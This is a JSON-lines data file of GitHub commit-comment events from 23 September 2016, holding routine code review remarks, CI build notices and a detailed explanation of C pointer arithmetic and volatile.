{"id":"4609519879","type":"CommitCommentEvent","actor":{"login":"cbfinn"},"repo":{"name":"tianheyu927/gps"},"payload":{"comment":{"id":19149004,"position":83,"line":203,"path":"python/gps/utility/generate_demo.py","commit_id":"3775709a0c496dd31b1c075e6e77289f124eb554","created_at":"2016-09-23T16:20:21Z","updated_at":"2016-09-23T16:20:21Z","body":"much nicer :)"}},"created_at":"2016-09-23T16:20:21Z"}
{"id":"4609520722","type":"CommitCommentEvent","actor":{"login":"jasons2000"},"repo":{"name":"Kladimir/DockFX"},"payload":{"comment":{"id":19149006,"position":null,"line":null,"path":null,"commit_id":"2ce4ee302fafd07757fc09e960c58b2d4fa56749","created_at":"2016-09-23T16:20:32Z","updated_at":"2016-09-23T16:20:32Z","body":"does it makes sense to add this to the ClearControl fork?"}},"created_at":"2016-09-23T16:20:32Z"}
{"id":"4609533486","type":"CommitCommentEvent","actor":{"login":"rwinch"},"repo":{"name":"rwinch/spring-framework"},"payload":{"comment":{"id":19149035,"position":5,"line":30,"path":"spring-test/src/test/java/org/springframework/test/web/MockHttpTests.java","commit_id":"be3f8c7f9e71c6fb6c65143c88925b79e8dddc78","created_at":"2016-09-23T16:22:59Z","updated_at":"2016-09-23T16:22:59Z","body":"I see. Yes, with my current approach we would need to create a base class. I just haven't taken it that far yet (wanted to get some feedback if I was going the right direction). Thanks again for the review!"}},"created_at":"2016-09-23T16:22:59Z"}
{"id":"4609533492","type":"CommitCommentEvent","actor":{"login":"yo1995"},"repo":{"name":"liangxuan2/microduino2"},"payload":{"comment":{"id":19149036,"position":null,"line":null,"path":null,"commit_id":"6120715d7ac49889909066cab9d639512b699035","created_at":"2016-09-23T16:22:59Z","updated_at":"2016-09-23T16:22:59Z","body":"欢迎加入github"}},"created_at":"2016-09-23T16:22:59Z"}
{"id":"4609536846","type":"CommitCommentEvent","actor":{"login":"ThomasWaldmann"},"repo":{"name":"pyinstaller/pyinstaller"},"payload":{"comment":{"id":19149044,"position":null,"line":null,"path":null,"commit_id":"fd3df7796afa367e511c881dac983cad0697b9a3","created_at":"2016-09-23T16:23:39Z","updated_at":"2016-09-23T16:23:39Z","body":"@davidh-ssec see my recent pull request."}},"created_at":"2016-09-23T16:23:39Z"}
{"id":"4609538843","type":"CommitCommentEvent","actor":{"login":"dshanske"},"repo":{"name":"pfefferle/wordpress-webmention"},"payload":{"comment":{"id":19149051,"position":null,"line":null,"path":null,"commit_id":"251be3498df895a1b96160ae931e9fae54cd6ba2","created_at":"2016-09-23T16:24:03Z","updated_at":"2016-09-23T16:24:03Z","body":"Would suggest that the message advises a removal date concurrent with the release of  4.8...two WordPress versions down the road."}},"created_at":"2016-09-23T16:24:03Z"}
{"id":"4609542216","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/Glyssen"},"payload":{"comment":{"id":19149056,"position":null,"line":null,"path":null,"commit_id":"18ce12b772ea76a5dd06952844debd7d0f3c0b84","created_at":"2016-09-23T16:24:32Z","updated_at":"2016-09-23T16:24:32Z","body":"TeamCity Glyssen :: Glyssen pull requests [Build *.*.260.18ce12b772ea76a5dd06952844debd7d0f3c0b84](http://build.palaso.org/viewLog.html?buildId=77094&buildTypeId=Glyssen_GlyssenPullRequests) outcome was **SUCCESS**\nSummary: Tests passed: 1496, ignored: 17 Build time: 00:07:43"}},"created_at":"2016-09-23T16:24:32Z"}
{"id":"4609543585","type":"CommitCommentEvent","actor":{"login":"dshanske"},"repo":{"name":"pfefferle/wordpress-webmention"},"payload":{"comment":{"id":19149060,"position":null,"line":null,"path":null,"commit_id":"251be3498df895a1b96160ae931e9fae54cd6ba2","created_at":"2016-09-23T16:24:48Z","updated_at":"2016-09-23T16:24:48Z","body":"Also look at apply_filters_deprecated introduced in 4.6"}},"created_at":"2016-09-23T16:24:48Z"}
{"id":"4609553590","type":"CommitCommentEvent","actor":{"login":"rbouqueau"},"repo":{"name":"gpac/gpac"},"payload":{"comment":{"id":19149081,"position":21,"line":3316,"path":"applications/mp4box/main.c","commit_id":"19863d71e326d47e508d8641f34c39de7c9e443d","created_at":"2016-09-23T16:26:45Z","updated_at":"2016-09-23T16:26:45Z","body":"this is not C89 and won't build with msvc10"}},"created_at":"2016-09-23T16:26:45Z"}
{"id":"4609557135","type":"CommitCommentEvent","actor":{"login":"rbouqueau"},"repo":{"name":"gpac/gpac"},"payload":{"comment":{"id":19149084,"position":24,"line":3318,"path":"applications/mp4box/main.c","commit_id":"19863d71e326d47e508d8641f34c39de7c9e443d","created_at":"2016-09-23T16:27:29Z","updated_at":"2016-09-23T16:27:29Z","body":"why not make a copy using strncy or memcpy?"}},"created_at":"2016-09-23T16:27:29Z"}
{"id":"4609562294","type":"CommitCommentEvent","actor":{"login":"rbouqueau"},"repo":{"name":"gpac/gpac"},"payload":{"comment":{"id":19149105,"position":75,"line":9343,"path":"src/isomedia/box_code_base.c","commit_id":"19863d71e326d47e508d8641f34c39de7c9e443d","created_at":"2016-09-23T16:28:30Z","updated_at":"2016-09-23T16:28:30Z","body":"why not add ```ptr->asset_id_length``` directly?"}},"created_at":"2016-09-23T16:28:30Z"}
{"id":"4609567300","type":"CommitCommentEvent","actor":{"login":"vanfstd"},"repo":{"name":"ioannad/experiments"},"payload":{"comment":{"id":19149114,"position":53,"line":56,"path":"rpiOS/K9OS/k9os.c","commit_id":"dab4692eedcefd23f5acb07591d03878ce776c42","created_at":"2016-09-23T16:29:31Z","updated_at":"2016-09-23T16:29:31Z","body":"> and indeed [negative indices] work fine!  This could come in handy.\r\n\r\nYep :-).  Just make sure never to access an element beyond the end or\r\nbefore the beginning of an array for then you'll invoke the dreaded\r\n[undefined behavior](https://en.wikipedia.org/wiki/Undefined_behavior).\r\nCompilers won't stop you (and might not or cannot even warn you about\r\nit).  For more information \"/msg candide ub\" on irc.freenode.org.\r\n\r\n\r\n> > unsigned int *gpio = (unsigned int *)GPIO_BASE; (the volatile is irrelevant here)\r\n> \r\n> After experimentation it seems that volatile is only necessary when \r\n> compiling with some optimisation level for non-preinitialised \r\n> variables. I assume that is why you say it's irrelevant there.\r\n\r\nYeah, I mean the volatile is irrelevant for the purposes of explaining\r\nthe code.  For the record, stuff declared volatile cannot be optimized\r\naway/rearranged by the compiler/etc.  Technically you need volatile if\r\nthere is the possibility that the value might \"spuriously\" change in a\r\nway the compiler cannot predict/know about, for example by the user\r\npushing a button that is hooked up to the GPIO.  Otherwise, if your code\r\nlooked for example like this:\r\n\r\n`for (;;) {`\r\n     `if (gpio[GPIO_BUTTON])`\r\n         `printf(\"User pressed it!\\n\");`\r\n`}`\r\n\r\nthen an optimizing compiler could notice that `gpio[GPIO_BUTTON]` is only\r\never read (but never written to) inside the loop, so instead of accessing\r\nthe memory (registers) behind it on each iteration, it might access it\r\nonly once and cache the result.  So if the user pushes the button, the\r\nmemory changes, but the program never realizes it since it doesn't bother\r\nto look beyond what it has cached locally. \r\nVolatile prevents this sort of optimization, forcing the compiler to\r\nactually hit the memory every time the value is read.\r\n\r\n\r\n> \r\n> > They're treating an integer as a pointer into an array. The \r\n> > distinction to/into sounds like nitpicking, but only until\r\n> \r\n> That's not nitpicking, there is a huge difference between \"to\" and \"into\". :)\r\n\r\nThe reason for why many would consider this nitpicking is that the\r\naddress of the first element of an array, and the address of the array\r\nitself are identical (since the array obviously begins where its first\r\nelement begins).\r\n\r\nI.e. in\r\n`int arr[42];`\r\n`int *ptr1 = arr;`\r\n`int (*ptr2)[42] = &arr;`\r\n, even though ptr1 and ptr2 are incompatible types (`int *` vs `int (*)[42]`),\r\nthey point to the same location in memory.\r\nhowever, if you then go and do `ptr1++; ptr2++;`, `ptr1` points to the\r\nsecond element of the array, while `ptr2` points right after the last\r\nelement of the array (since pointer arithmetic \"knows\" how large the\r\npointed-to type is and advances the pointer accordingly -- by the size\r\nof one int in the case of `ptr`, but by the size of an array of 42 ints\r\nin the case of `ptr2`.\r\n\r\n> \r\n> PS. IOCCC: lol!! \r\n\r\nThere are some real gems to discover there :)\r\n\r\n\r\n> Wait a minute...:\r\n> \r\n> > foo[bar] is nothing but syntactic sugar for *(foo + bar)\r\n> \r\n> Due to (2) I assume you mean foo[bar]==*(foo + (sizeof-foo)*bar)?\r\n\r\nNo, I really meant *(foo + bar) (and \"sizeof-foo\" is a syntax error :P).\r\nThe important thing here is that this `+` is not integer addition, it's\r\npointer arithmetic.  It knows how much to add to the memory address so\r\nas to advance the pointer far enough to point to `bar` elements farther\r\nthan it used to point.\r\n\r\nI mentioned sizeof only to point out what happens to the actual memory\r\naddresses -- have a pointer to int, add 1, now the memory address your\r\npointer holds is, say, larger by 4 than it was before (assuming the size\r\nof int is 4 bytes on the machine in question).\r\n\r\nRemind me to draw you a little picture when we meet the next time :),\r\nit's really simple, only tough to explain in writing.\r\n\r\n\r\n> In fact LED_GPFSEL == 1. So I guess unsigned ints have 4bytes size here,\r\n\r\nThat's pretty likely on 32bit systems, yes\r\n\r\n> so I have to divide by 4 everything i added to GPIO_BASE before...\r\n\r\nOnly if you do your additions on an integer rather than on a pointer.\r\nDo note that this equation is true:\r\n`(unsigned int *)(GPIO_BASE + 4) == ((unsigned int *)GPIO_BASE) + 1`\r\n(on the left hand side, there's integer addition -- on the right hand\r\nsize, there's pointer arithmetic)\r\n\r\n> `(1<<16)`\r\n\r\nGood shift. This is pretty readable since you want to set bit 16,\r\nso it's nice having an actual 16 there.\r\n\r\n> `gpio[0x1c>>2]`\r\n\r\nBad shift :).  I mean, people will understand it, but for clarity\r\nI'd rather say 0x1c/4.  You want to divide by 4, so divide by 4. Leave\r\nit to the compiler to optimize (and rest assured, the compiler *will*\r\nrealize that dividing by 4 can be done quickly using shifts, and generate\r\nthe appropriate shift instruction anyway).\r\n\r\n> (0x1c>>2)[gpio] etc works fine! :laughing:\r\n\r\nNaughty! :P\r\n\r\nCheers\r\n"}},"created_at":"2016-09-23T16:29:31Z"}
{"id":"4609571173","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimWindowsUI"},"payload":{"comment":{"id":19149120,"position":null,"line":null,"path":null,"commit_id":"d9eb91bdf616925521491286248341901eb60ace","created_at":"2016-09-23T16:30:18Z","updated_at":"2016-09-23T16:30:18Z","body":"TeamCity Xbim :: Xbim Windows UI :: Xbim Windows UI [Build 141](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1224&buildTypeId=Xbim_XbimWindowsUi_XbimWindowsUi) is now running\n"}},"created_at":"2016-09-23T16:30:18Z"}
{"id":"4609577471","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimWindowsUI"},"payload":{"comment":{"id":19149130,"position":null,"line":null,"path":null,"commit_id":"d9eb91bdf616925521491286248341901eb60ace","created_at":"2016-09-23T16:31:14Z","updated_at":"2016-09-23T16:31:14Z","body":"TeamCity Xbim :: Xbim Windows UI :: Xbim Windows UI [Build 141](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1224&buildTypeId=Xbim_XbimWindowsUi_XbimWindowsUi) outcome was **FAILURE**\nSummary: Exit code 1 (new) Build time: 00:00:56"}},"created_at":"2016-09-23T16:31:14Z"}
{"id":"4609578874","type":"CommitCommentEvent","actor":{"login":"kevgs"},"repo":{"name":"natsys/mariadb_10.2"},"payload":{"comment":{"id":19149135,"position":null,"line":null,"path":null,"commit_id":"e0ef1e342c44bfd1adbe897f024f495451189586","created_at":"2016-09-23T16:31:32Z","updated_at":"2016-09-23T16:31:32Z","body":"Sorry, it existed before the patch. What is the policy on fixing warnings? Can I commit patches to fix them?"}},"created_at":"2016-09-23T16:31:32Z"}
{"id":"4609585575","type":"CommitCommentEvent","actor":{"login":"jcrodriguez-dis"},"repo":{"name":"jcrodriguez-dis/moodle-mod_vpl"},"payload":{"comment":{"id":19149150,"position":null,"line":null,"path":null,"commit_id":"be2e463c5b0b56cc197d7ef4a2ab802e78912e4d","created_at":"2016-09-23T16:32:54Z","updated_at":"2016-09-23T16:32:54Z","body":"Thanks, for your bug report."}},"created_at":"2016-09-23T16:32:54Z"}
{"id":"4609592168","type":"CommitCommentEvent","actor":{"login":"gorkem"},"repo":{"name":"gorkem/vscode-java"},"payload":{"comment":{"id":19149177,"position":null,"line":null,"path":null,"commit_id":"395d61bf25eccc5a505bccf1c1b70d3066503206","created_at":"2016-09-23T16:34:13Z","updated_at":"2016-09-23T16:34:13Z","body":"@fbricon file an issue otherwise it did not happen :)\r\n"}},"created_at":"2016-09-23T16:34:13Z"}
{"id":"4609593832","type":"CommitCommentEvent","actor":{"login":"larsbrinkhoff"},"repo":{"name":"tomgrove/WLCompiler"},"payload":{"comment":{"id":19149182,"position":null,"line":null,"path":null,"commit_id":"2824a714a3813245a1146543b7ffbf69fcd80f56","created_at":"2016-09-23T16:34:35Z","updated_at":"2016-09-23T16:34:35Z","body":"Any progress on this?  Don't leave us haning! :smile: "}},"created_at":"2016-09-23T16:34:35Z"}
{"id":"4609599518","type":"CommitCommentEvent","actor":{"login":"dreamsystems"},"repo":{"name":"domaven/xamarin-plugins"},"payload":{"comment":{"id":19149194,"position":null,"line":null,"path":null,"commit_id":"74ec1dc4e3413869e315ab0188772323ed9f5c18","created_at":"2016-09-23T16:35:42Z","updated_at":"2016-09-23T16:35:42Z","body":"Same problem of incompatibility with Xamarin.Forms. Even the pre-release requires GooglePlayServices to be equal to 29.0.0.1. "}},"created_at":"2016-09-23T16:35:42Z"}
{"id":"4609599700","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":19149196,"position":null,"line":null,"path":null,"commit_id":"762cdf14382f4979df6ff9f909d0af9f053082dc","created_at":"2016-09-23T16:35:44Z","updated_at":"2016-09-23T16:35:44Z","body":"[Your benchmark job](https://github.com/JuliaLang/julia/commit/762cdf14382f4979df6ff9f909d0af9f053082dc#commitcomment-19146596) has completed - possible performance regressions were detected. A full report can be found [here](https://github.com/JuliaCI/BaseBenchmarkReports/blob/84eafc10a16fe9117548b924361fcff0cb3d2300/762cdf1_vs_e60961b/report.md). cc @jrevels"}},"created_at":"2016-09-23T16:35:44Z"}
{"id":"4609607619","type":"CommitCommentEvent","actor":{"login":"jurmala1979"},"repo":{"name":"jurmala1979/Jurasik"},"payload":{"comment":{"id":19149212,"position":1,"line":1,"path":"README.md","commit_id":"73659a7a051a211218ddad63be87620f06597076","created_at":"2016-09-23T16:37:23Z","updated_at":"2016-09-23T16:37:23Z","body":"[http://85.21.233.117:9000/live](url)"}},"created_at":"2016-09-23T16:37:23Z"}
{"id":"4609608524","type":"CommitCommentEvent","actor":{"login":"marek-safar"},"repo":{"name":"mono/mono"},"payload":{"comment":{"id":19149214,"position":4,"line":148,"path":"mcs/class/System/System.Net/HttpWebRequest.cs","commit_id":"112631f5c6926eb00544cd39f6be7a98983503b8","created_at":"2016-09-23T16:37:32Z","updated_at":"2016-09-23T16:37:32Z","body":"My preference would be not to add it at all. Similarly for HttpWebResponse. We'll get them when we start generating .net reference api anyway"}},"created_at":"2016-09-23T16:37:32Z"}
{"id":"4609609843","type":"CommitCommentEvent","actor":{"login":"may-cat"},"repo":{"name":"bitrix-expert/bitrix_boilerplate"},"payload":{"comment":{"id":19149221,"position":null,"line":null,"path":null,"commit_id":"4bbfa3f50e2d52e70adbbb2c25e1976ab458281c","created_at":"2016-09-23T16:37:50Z","updated_at":"2016-09-23T16:37:50Z","body":"Упс, я похоже файл не закоммитил.\r\nв файле `bitrix_boilerplate/vagrant.custom/init.bash`\r\nесть вызов\r\n```\r\n## Установка БД\r\nmysql -uroot < /home/bitrix/vagrant.custom/mysql.sql\r\n```\r\nТам создаётся-настраивается база.\r\nСейчас докину."}},"created_at":"2016-09-23T16:37:50Z"}
{"id":"4609610036","type":"CommitCommentEvent","actor":{"login":"renwokuang"},"repo":{"name":"hklcf/myTV-api"},"payload":{"comment":{"id":19149222,"position":null,"line":null,"path":null,"commit_id":"c687d4c32fb85233f98ef17109d900222ce5696b","created_at":"2016-09-23T16:37:52Z","updated_at":"2016-09-23T16:37:52Z","body":"全封了"}},"created_at":"2016-09-23T16:37:52Z"}
{"id":"4609612448","type":"CommitCommentEvent","actor":{"login":"tkelman"},"repo":{"name":"sisl/BayesNets.jl"},"payload":{"comment":{"id":19149226,"position":4,"line":18,"path":"src/BayesNets.jl","commit_id":"35fda5b5baffc58c48e015a4f311b770c75ec8ef","created_at":"2016-09-23T16:38:22Z","updated_at":"2016-09-23T16:38:22Z","body":"don't have to do 1. do the rest, then just change the sha of the tag in your metadata fork branch for the already open pr"}},"created_at":"2016-09-23T16:38:22Z"}
{"id":"4609613883","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/Glyssen"},"payload":{"comment":{"id":19149229,"position":null,"line":null,"path":null,"commit_id":"222604b9e9e2d441ba65b1fe36ed948e33927278","created_at":"2016-09-23T16:38:40Z","updated_at":"2016-09-23T16:38:40Z","body":"TeamCity Glyssen :: Glyssen pull requests [Build *.*.261.222604b9e9e2d441ba65b1fe36ed948e33927278](http://build.palaso.org/viewLog.html?buildId=77096&buildTypeId=Glyssen_GlyssenPullRequests) outcome was **SUCCESS**\nSummary: Tests passed: 1496, ignored: 17 Build time: 00:08:41"}},"created_at":"2016-09-23T16:38:40Z"}
{"id":"4609614555","type":"CommitCommentEvent","actor":{"login":"reefdog"},"repo":{"name":"documentcloud/documentcloud"},"payload":{"comment":{"id":19149230,"position":null,"line":null,"path":null,"commit_id":"be8d48d3938d975c3a354264ef6c705758df170b","created_at":"2016-09-23T16:38:49Z","updated_at":"2016-09-23T16:38:49Z","body":"This title is actually a little wrong; queries were always optional, we're just explicitly wrapping the trailing slash and the query in parens to indicate the whole thing is optional."}},"created_at":"2016-09-23T16:38:49Z"}
{"id":"4609617033","type":"CommitCommentEvent","actor":{"login":"may-cat"},"repo":{"name":"bitrix-expert/bitrix_boilerplate"},"payload":{"comment":{"id":19149235,"position":null,"line":null,"path":null,"commit_id":"4bbfa3f50e2d52e70adbbb2c25e1976ab458281c","created_at":"2016-09-23T16:39:18Z","updated_at":"2016-09-23T16:39:18Z","body":"А, нет, вру. Есть, закоммиченное:\r\nhttps://github.com/bitrix-expert/bitrix_boilerplate/blob/master/vagrant.custom/mysql.sql"}},"created_at":"2016-09-23T16:39:18Z"}
{"id":"4609620781","type":"CommitCommentEvent","actor":{"login":"regalstreak"},"repo":{"name":"halogenOS/android_build"},"payload":{"comment":{"id":19149242,"position":null,"line":null,"path":null,"commit_id":"fcc4b2fc143062f8051ba81133d68ac41d69deab","created_at":"2016-09-23T16:40:01Z","updated_at":"2016-09-23T16:40:01Z","body":"Why do we need this still?"}},"created_at":"2016-09-23T16:40:01Z"}
{"id":"4609626490","type":"CommitCommentEvent","actor":{"login":"williamcroberts"},"repo":{"name":"williamcroberts/selinux"},"payload":{"comment":{"id":19149252,"position":null,"line":null,"path":null,"commit_id":"f40d7facbcaf1337f37b5630b98806fd25b1dbf9","created_at":"2016-09-23T16:41:08Z","updated_at":"2016-09-23T16:41:08Z","body":"after:\r\n180236\r\n\r\nBefore:\r\n112728"}},"created_at":"2016-09-23T16:41:08Z"}
{"id":"4609626941","type":"CommitCommentEvent","actor":{"login":"tanmaykurmi"},"repo":{"name":"tanmaykurmi/hello-world1"},"payload":{"comment":{"id":19149253,"position":null,"line":null,"path":null,"commit_id":"0216f9efa428c3b401f40145e9c2faaf2b1863ca","created_at":"2016-09-23T16:41:12Z","updated_at":"2016-09-23T16:41:12Z","body":"3213"}},"created_at":"2016-09-23T16:41:12Z"}
{"id":"4609631918","type":"CommitCommentEvent","actor":{"login":"williamcroberts"},"repo":{"name":"williamcroberts/selinux"},"payload":{"comment":{"id":19149261,"position":null,"line":null,"path":null,"commit_id":"f40d7facbcaf1337f37b5630b98806fd25b1dbf9","created_at":"2016-09-23T16:42:16Z","updated_at":"2016-09-23T16:42:16Z","body":"It probably does bring in functionality not required, but I attempted to drop out the minimum stuff and keep the changes as unobtrusive as possible, I think it's a reasonable starting point."}},"created_at":"2016-09-23T16:42:16Z"}
{"id":"4609633139","type":"CommitCommentEvent","actor":{"login":"stephensmalley"},"repo":{"name":"williamcroberts/selinux"},"payload":{"comment":{"id":19149264,"position":20,"line":46,"path":"libselinux/src/callbacks.c","commit_id":"f40d7facbcaf1337f37b5630b98806fd25b1dbf9","created_at":"2016-09-23T16:42:31Z","updated_at":"2016-09-23T16:42:31Z","body":"Why is this necessary - it is not conditional in the Android libselinux currently?"}},"created_at":"2016-09-23T16:42:31Z"}
{"id":"4609634588","type":"CommitCommentEvent","actor":{"login":"kunnix"},"repo":{"name":"DefinitelyTyped/DefinitelyTyped"},"payload":{"comment":{"id":19149267,"position":null,"line":null,"path":null,"commit_id":"1adaa22d7a6cc83ce09638e2cae00fc6f6589857","created_at":"2016-09-23T16:42:50Z","updated_at":"2016-09-23T16:42:50Z","body":"Sorry I don't have much time to help right now. All the [LayerGroup](http://leafletjs.com/reference-1.0.0.html#layergroup) code is missing for sure.\r\n\r\nAs the API is mostly the same as in 0.7, it might be better for the user experience to revert it to the 0.7 definition file (npm version @types/leaflet@1.0.32), then to update it in the light of [API Changes](https://github.com/Leaflet/Leaflet/blob/master/CHANGELOG.md).\r\n\r\nI was surprised to see all of my code breaking by simply updating from @types/leaflet@1.0.32 (pretty complete) to @types/leaflet@1.0.33 (which original author tagged as a \"Work In Progress\" - not sure it was intended to go live)."}},"created_at":"2016-09-23T16:42:50Z"}
{"id":"4609640039","type":"CommitCommentEvent","actor":{"login":"williamcroberts"},"repo":{"name":"williamcroberts/selinux"},"payload":{"comment":{"id":19149275,"position":14,"line":29,"path":"libselinux/src/procattr.c","commit_id":"f40d7facbcaf1337f37b5630b98806fd25b1dbf9","created_at":"2016-09-23T16:43:56Z","updated_at":"2016-09-23T16:43:56Z","body":"Android provides the declaration in unistd.h and the definition as well. Change from HOST to ANDROID."}},"created_at":"2016-09-23T16:43:56Z"}
{"id":"4609642369","type":"CommitCommentEvent","actor":{"login":"enalves"},"repo":{"name":"enalves/hello-world"},"payload":{"comment":{"id":19149279,"position":1,"line":1,"path":"README.md","commit_id":"ddf2f47a9f6b64f9f83873772cadac1ab1158195","created_at":"2016-09-23T16:44:25Z","updated_at":"2016-09-23T16:44:25Z","body":"Teste\r\n"}},"created_at":"2016-09-23T16:44:25Z"}
{"id":"4609643561","type":"CommitCommentEvent","actor":{"login":"PoisonNinja"},"repo":{"name":"PoisonNinja/iris"},"payload":{"comment":{"id":19149280,"position":5,"line":5,"path":"kernel/acpi/acpi.c","commit_id":"b6f338a5eb392387760585d6c419dafb8645d103","created_at":"2016-09-23T16:44:40Z","updated_at":"2016-09-23T16:44:40Z","body":"Ahh, that was from my own OS that was GPL licensed. I'll fix that"}},"created_at":"2016-09-23T16:44:40Z"}
{"id":"4609646853","type":"CommitCommentEvent","actor":{"login":"aggixx"},"repo":{"name":"simulationcraft/simc"},"payload":{"comment":{"id":19149286,"position":null,"line":null,"path":null,"commit_id":"c364e5592ff8f1ff6ebdbf7e496a5056269eb7cd","created_at":"2016-09-23T16:45:22Z","updated_at":"2016-09-23T16:45:22Z","body":"Old War. Oops, forgot a word."}},"created_at":"2016-09-23T16:45:22Z"}
{"id":"4609650379","type":"CommitCommentEvent","actor":{"login":"bobbilee19"},"repo":{"name":"kristenmkarcher/address-bloc2"},"payload":{"comment":{"id":19149297,"position":16,"line":16,"path":"models/address_book.rb","commit_id":"e46ca98534d5de6f17d348a9955221e2f9546293","created_at":"2016-09-23T16:46:05Z","updated_at":"2016-09-23T16:46:05Z","body":"https://github.com/kristenmkarcher/address-bloc2/commit/e46ca98534d5de6f17d348a9955221e2f9546293\r\n"}},"created_at":"2016-09-23T16:46:05Z"}
{"id":"4609651636","type":"CommitCommentEvent","actor":{"login":"tnozicka"},"repo":{"name":"rupalibehera/kitchensink-html5-mobile"},"payload":{"comment":{"id":19149300,"position":5,"line":32,"path":".openshift-pipeline/Jenkinsfile","commit_id":"79211b81f95c6cc94bbea924e1390c2bce2384ca","created_at":"2016-09-23T16:46:20Z","updated_at":"2016-09-23T16:46:20Z","body":"@rupalibehera you need `--follow` flag as well, otherwise you won't see the logs"}},"created_at":"2016-09-23T16:46:20Z"}
{"id":"4609653955","type":"CommitCommentEvent","actor":{"login":"tnozicka"},"repo":{"name":"rupalibehera/quickstart"},"payload":{"comment":{"id":19149304,"position":5,"line":34,"path":"kitchensink/.openshift-pipeline/Jenkinsfile","commit_id":"4c9d9b6665e7fcca43d9b7381a3c76620e39a422","created_at":"2016-09-23T16:46:50Z","updated_at":"2016-09-23T16:46:50Z","body":"@rupalibehera you need `--follow` flag as well, otherwise you won't see the logs"}},"created_at":"2016-09-23T16:46:50Z"}
{"id":"4609656099","type":"CommitCommentEvent","actor":{"login":"brussee"},"repo":{"name":"csrdelft/csrdelft.nl"},"payload":{"comment":{"id":19149312,"position":13,"line":425,"path":"lib/model/entity/Profiel.class.php","commit_id":"e2c98a854af06831e7fb6e732fb5ead4668464ed","created_at":"2016-09-23T16:47:18Z","updated_at":"2016-09-23T16:47:18Z","body":"Het wordt nu nog slechts 1 keer gebruikt, maar een boolean checken is goedkoper dan de functie ```::mag``` uitvoeren dus het is beter om hier ```!$force AND ...``` te doen."}},"created_at":"2016-09-23T16:47:18Z"}
{"id":"4609657360","type":"CommitCommentEvent","actor":{"login":"defstat"},"repo":{"name":"defstat/PKP-QuickSubmitPlugin"},"payload":{"comment":{"id":19149314,"position":22,"line":94,"path":"QuickSubmitPlugin.inc.php","commit_id":"9338ccfd9cda95683ce37d1b9c1e64df9f39d0f5","created_at":"2016-09-23T16:47:32Z","updated_at":"2016-09-23T16:47:32Z","body":"Alec hi. It seems that I have a problem here. The post request don't seem to redirect to submitSuccess, even though the code reaches $templateMgr->display('submitSuccess.tpl');"}},"created_at":"2016-09-23T16:47:32Z"}
{"id":"4609658878","type":"CommitCommentEvent","actor":{"login":"stephensmalley"},"repo":{"name":"williamcroberts/selinux"},"payload":{"comment":{"id":19149320,"position":null,"line":null,"path":null,"commit_id":"f40d7facbcaf1337f37b5630b98806fd25b1dbf9","created_at":"2016-09-23T16:47:50Z","updated_at":"2016-09-23T16:47:50Z","body":"Not sure what those numbers correspond to.  On a recent AOSP master build, system/lib64/libselinux.so was only 89472 bytes."}},"created_at":"2016-09-23T16:47:50Z"}
{"id":"4609660563","type":"CommitCommentEvent","actor":{"login":"stephensmalley"},"repo":{"name":"williamcroberts/selinux"},"payload":{"comment":{"id":19149325,"position":null,"line":null,"path":null,"commit_id":"f40d7facbcaf1337f37b5630b98806fd25b1dbf9","created_at":"2016-09-23T16:48:11Z","updated_at":"2016-09-23T16:48:11Z","body":"That is on ARM64."}},"created_at":"2016-09-23T16:48:11Z"}
{"id":"4609664284","type":"CommitCommentEvent","actor":{"login":"stephensmalley"},"repo":{"name":"williamcroberts/selinux"},"payload":{"comment":{"id":19149339,"position":null,"line":null,"path":null,"commit_id":"f40d7facbcaf1337f37b5630b98806fd25b1dbf9","created_at":"2016-09-23T16:48:58Z","updated_at":"2016-09-23T16:48:58Z","body":"71196 bytes on ARM32 (system/lib/libselinux.so)"}},"created_at":"2016-09-23T16:48:58Z"}
{"id":"4609666300","type":"CommitCommentEvent","actor":{"login":"PoisonNinja"},"repo":{"name":"PoisonNinja/iris"},"payload":{"comment":{"id":19149346,"position":13,"line":255,"path":"Makefile","commit_id":"a881cb8a641eccf22526e23f3b60b4aafdf03be5","created_at":"2016-09-23T16:49:22Z","updated_at":"2016-09-23T16:49:22Z","body":"The block size was changed in a later commit. Some of the block size options weren't supported on Mac OS X's version of genext2fs. So the missing devtable is the reason why sudo doesn't work..."}},"created_at":"2016-09-23T16:49:22Z"}
{"id":"4609669375","type":"CommitCommentEvent","actor":{"login":"popolihu123"},"repo":{"name":"hklcf/myTV-api"},"payload":{"comment":{"id":19149352,"position":null,"line":null,"path":null,"commit_id":"5b519ed6791ff0ba43efc12ec338b9a5aec47f5f","created_at":"2016-09-23T16:50:00Z","updated_at":"2016-09-23T16:50:00Z","body":"谢谢大神提醒 一点就破"}},"created_at":"2016-09-23T16:50:00Z"}
{"id":"4609670217","type":"CommitCommentEvent","actor":{"login":"gleckler1"},"repo":{"name":"PCMDI/obs4MIPs-cmor-tables"},"payload":{"comment":{"id":19149356,"position":null,"line":null,"path":null,"commit_id":"8e92786a2cfa629bf805fd4bea446bab086c8728","created_at":"2016-09-23T16:50:12Z","updated_at":"2016-09-23T16:50:12Z","body":"@taylor13 @durack1 See proposed edits following KT's suggested changes..."}},"created_at":"2016-09-23T16:50:12Z"}
{"id":"4609670747","type":"CommitCommentEvent","actor":{"login":"popolihu123"},"repo":{"name":"hklcf/myTV-api"},"payload":{"comment":{"id":19149360,"position":null,"line":null,"path":null,"commit_id":"5b519ed6791ff0ba43efc12ec338b9a5aec47f5f","created_at":"2016-09-23T16:50:18Z","updated_at":"2016-09-23T16:50:18Z","body":"感谢大神"}},"created_at":"2016-09-23T16:50:18Z"}
{"id":"4609670837","type":"CommitCommentEvent","actor":{"login":"andry-tino"},"repo":{"name":"andry-tino/inet"},"payload":{"comment":{"id":19149361,"position":7,"line":185,"path":"src/inet/linklayer/ieee80211ac/mac/MuEnabledDcfUpperMac.cc","commit_id":"232d367fae512cc4ccb216c67ed30f6369d725b5","created_at":"2016-09-23T16:50:19Z","updated_at":"2016-09-23T16:50:19Z","body":"This was causing the crash."}},"created_at":"2016-09-23T16:50:19Z"}
